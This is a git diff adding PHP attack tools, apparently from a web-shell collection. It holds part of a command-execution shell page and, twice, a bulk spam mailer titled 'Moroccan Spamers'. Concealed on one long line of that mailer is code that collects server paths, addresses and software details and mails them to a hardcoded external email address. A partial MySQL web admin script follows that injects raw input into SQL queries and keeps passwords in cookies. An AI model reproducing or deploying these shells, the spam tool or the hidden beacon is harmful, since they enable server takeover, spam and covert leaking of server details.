+ 	 <tr>
+
+	  <td valign="top" class="silver border">
+
+           <?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>==> PHPKonsole <==</strong></font>", "cmd=con").sp(2); ?>
+
+	  </td>
+
+ 	  <td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
+
+	   <br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
+
+	    When you run commands they will run as the webservers UserID. This should work perfectly
+
+	    for managing files, like moving, copying etc. If you're using a linux server, system commands
+
+	    such as ls, mv and cp will be available for you... <br><br>This function will only work if the
+
+	    server supports php and the execute commands...<br><br>
+
+	  </td>
+
+	 </tr>
+
+        </table>
+
+	</center>
+
+	<br>
+
+     <?php
+
+}
+
+
+
+if ($cmd != "downl") {
+
+	if ( $isMainMenu != true) {
+
+ 		?>
+
+		<table width="100%" border="0" cellpadding="0" cellspacing="0">
+
+		 <tr>
+
+		  <td width="100%" style="class="silver border">
+
+		   <center><strong>
+
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;]  </font>", "cmd=&dir=");      ?>&nbsp;&nbsp;
+
+		    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;PHPKonsole&nbsp;] </font>", "cmd=con");        ?>&nbsp;&nbsp;
+
+                    &nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Haxplorer&nbsp;]  </font>", "cmd=dir&dir=.");  ?> &nbsp;&nbsp;
+
+ 		   </strong></center>
+
+		  </td>
+
+		 </tr>
+
+		</table>
+
+		<br>
+
+		<?php
+
+}
+
+	?>
+
+	<table width=100% border="0" cellpadding="0" cellspacing="0">
+
+	 <tr>
+
+	  <td width="100%" class="silver border">
+
+	   <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
+
+	  </td>
+
+	 </tr>
+
+	</table>
+
+ 	   </td>
+
+  </tr>
+
+ </table>
+
+
+
+  <?php
+
+ }
+
+
+
+?> 
+
+
+
+
+
+
+
diff --git a/php/Moroccan Spamers Ma-EditioN By GhOsT.php b/php/Moroccan Spamers Ma-EditioN By GhOsT.php
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/php/Moroccan Spamers Ma-EditioN By GhOsT.php	
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/php/Moroccan_Spamers_Ma-EditioN_By_GhOsT.php b/php/Moroccan_Spamers_Ma-EditioN_By_GhOsT.php
new file mode 100644
index 0000000..2865e14
--- /dev/null
+++ b/php/Moroccan_Spamers_Ma-EditioN_By_GhOsT.php
@@ -0,0 +1,182 @@
+<? 
+if ($action=="send"){ 
+$message = urlencode($message); 
+$message = ereg_replace("%5C%22", "%22", $message); 
+$message = urldecode($message); 
+$message = stripslashes($message); 
+$subject = stripslashes($subject); 
+} 
+
+?> 
+<form name="form1" method="post" action="" enctype="multipart/form-data"> 
+<div align="center"> 
+<center> 
+<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#006699" width="74%" id="AutoNumber1"> 
+<tr> 
+<td width="100%"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> 
+<tr> 
+<td width="100%"> 
+<p align="center"><div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#336699" width="70%" cellpadding="0" id="AutoNumber1" height="277"> 
+<tr> 
+<td width="100%" height="272"> 
+<table width="769" border="0" height="303"> 
+<tr> 
+<td width="786" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic3.gif" colspan="3" height="28"> 
+<p align="center"><b><font face="Tahoma" size="2" color="#FF6600">  Moroccan Spamers Ma-EditioN By GhOsT </font></b></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Email:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your 
+Name:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" valign="middle"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="text" name="realname" value="<? print $realname; ?>" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div> 
+</td> 
+<td width="390" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach 
+File:</font></div> 
+</td> 
+<td width="317" bordercolor="#CCCCCC" bgcolor="#F0F0F0" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input type="file" name="file" size="30"> 
+</font></td> 
+</tr> 
+<tr> 
+<td width="79" background="/simparts/images/cellpic1.gif" height="22" align="right"> 
+<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div> 
+</td> 
+<td colspan="2" width="715" background="/simparts/images/cellpic1.gif" height="22"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"> 
+<input name="subject" value="<? print $subject; ?>" size="59" style="float: left"> 
+</font></td> 
+</tr> 
+<tr valign="top"> 
+<td colspan="2" width="477" bgcolor="#CCCCCC" height="189" valign="top"> 
+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/php/MySQL Web Interface Version 0.8.php b/php/MySQL Web Interface Version 0.8.php
new file mode 100644
index 0000000..a106ddf
--- /dev/null
+++ b/php/MySQL Web Interface Version 0.8.php	
@@ -0,0 +1,1302 @@
+<?
+/*
+* MySQL Web Interface Version 0.8
+* -------------------------------
+* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+* License : GNU Public License (GPL)
+* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text 
+name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password 
+name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is 
+available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; 
+URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' 
+onClick=\"return confirm('Drop Database 
+\'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' 
+onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a 
+href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add 
+Field</a> | \n";
+	echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View 
+Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a 
+href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' 
+onClick=\"return confirm('Drop Field 
+\'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of 
+digits 
+following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == 
+"tinyint" ) 
+echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == 
+"smallint" 
+) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == 
+"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) 
+echo 
+"checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" 
+) 
+echo "checked";?>>BIGINT (-9223372036854775808 ~ 
+9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) 
+echo 
+"checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
